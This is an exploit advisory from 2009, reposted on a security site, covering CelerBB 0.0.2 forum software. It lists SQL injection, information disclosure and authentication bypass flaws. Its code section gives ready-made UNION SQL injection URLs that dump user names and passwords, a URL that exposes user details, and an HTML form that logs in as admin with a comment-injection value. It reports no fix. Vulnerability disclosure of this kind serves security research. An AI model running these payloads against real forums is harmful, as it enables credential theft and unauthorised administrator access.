CelerBB 0.0.2 Multiple Vulnerabilities

2009-03-05 / 2009-03-06
Credit: drosophila
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

******* Salvatore "drosophila" Fresta ******* [+] Application: CelerBB [+] Version: 0.0.2 [+] Website: http://celerbb.sourceforge.net/ [+] Bugs: [A] Multiple SQL Injection [B] Information Disclosure [C] Authenticaion Bypass [+] Exploitation: Remote [+] Date: 05 Mar 2009 [+] Discovered by: Salvatore "drosophila" Fresta [+] Author: Salvatore "drosophila" Fresta [+] Contact: e-mail: drosophilaxxx_at_gmail&#46;com ************************************************* [+] Menu 1) Bugs 2) Code 3) Fix ************************************************* [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: viewforum.php, viewtopic.php This bug allows a guest to view username and password list. - [B] Information Disclosure [-] Requisites: none [-] File affected: showme.php This bug allows a guest to view reserved information of any user. - [C] Authentication Bypass [-] Requisites: magic_quotes_gpc = off [-] File affected: login.php This bug allows a guest to bypass authentication. ************************************************* [+] Code - [A] Multiple SQL Injection http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23 http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23 - [B] Information Disclosure http://www.site.com/path/showme.php?user=admin - [C] Authentication Bypass <html> <head> <title>CelerBB 0.0.2 Authentication Bypass Exploit</title> </head> <body> <form action="login.php" method="POST"> <input type="hidden" name="Username" value="admin'#"> <input type="submit" value="Exploit"> </form> </body> </html> ************************************************* [+] Fix No fix. ************************************************* <pre>-- Salvatore "drosophila" FrestaCWNP444351</pre>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top